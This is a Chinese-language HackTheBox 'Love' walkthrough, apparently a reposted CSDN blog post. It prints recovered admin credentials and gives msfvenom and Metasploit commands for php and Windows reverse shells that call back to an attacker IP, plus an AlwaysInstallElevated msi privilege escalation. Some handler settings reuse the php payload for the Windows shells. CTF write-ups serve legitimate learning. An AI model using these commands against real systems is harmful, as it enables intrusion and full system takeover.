其他分享
首页 > 其他分享> > hackthebox---love

hackthebox---love

作者:互联网

hackthbox--love

文章目录


前言


一、nmap信息收集

首先,老规矩,先给它嘛来一梭子,nmap走起!
看看开启了那些端口,那些服务
在这里插入图片描述
好的,开启了很多的服务,开启的端口越多对我们越有利 (笑容逐渐放肆)
再次进行详细的信息收集
在这里插入图片描述
去各个端口访问一波,没太大的收获,其中80和5000端口如下:
在这里插入图片描述

在这里插入图片描述
被禁止访问了!有点意思,肯定有货,才禁止我们访问

二、ssl证书域名解析

发现443端口上提示有个staging.love.htb域名,很好,那么我们可以去修改
/etc/hosts的文件,指定这个域名的解析ip为10.10.10.239,然后就可以去访问这个域名了,kali中的修改命令如下:vim /etc/hosts
成功访问,结果如下:

在这里插入图片描述
home看起来没有什么特别值得关注的,直接到demo
在这里插入图片描述
发现可以通过 “url地址” 去访问文件,于是想起了那个被禁止的5000端口,于是尝试一下,看看能不能访问,命令 “ localhost:5000 ” ,访问结果如下:
在这里插入图片描述
在这里插入图片描述
成功获取账号与密码:
账号:admin
密码:@LoveIsInTheAir!!! (咳咳,翻译:爱在空气里,所以说啊,爱不可靠啊)
80端口不是有个登录界面吗?直接输入账号密码,然后就可以登录进去了

三、进入后台,获取反向的shell

进入后台的管理界面如下:
在这里插入图片描述
然后找到这个:
在这里插入图片描述
点击new:
在这里插入图片描述
这里有个photo的地方, 可以上传php文件,那么我们就可以上传一个php/reverse_tcp文件用来反向连接我们的主机,我们可以使用msfvenom来创建一个php的反向shell文件,命令如下:
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.15.156 lport=3333 -f raw -o a.php
然后使用kali另外的终端来监听,命令如下:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.15.156
set lport 3333
exploit

四、windows_reverse_shell

由于php的反向shell连接不稳定,所以我们创建一个新的反向shell,同样使用msfvenom来创建,命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.15.156 lport=4444 -f exe -o 123.exe

在上传php的地方上传,然后再在phpshell里面执行这个文件
执行的命令如下:
execute -H -f 123.exe

同样使用另外的端口来监听:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.15.156
set lport 4444
exploit

然后就可以在新的端口得到一个连接

五、提权

提权我们可以利用AlwaysInstalledElevated的提权漏洞,
那么创建一个msi文件,命令如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.15.156 lport=5555 -f msi > shell.msi

在123.exe的shell中执行 execute -H -f shell.msi

再次开启一个新的端口监听:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.15.156
set lport 5555
exploit

然后可以得到一个连接,使用getuid可以得到sytem权限

总结

还是很菜啊,还是得继续努力加油,干巴跌

标签:set,love,reverse,端口,tcp,---,hackthebox,shell,php
来源: https://blog.csdn.net/weixin_47156475/article/details/119461195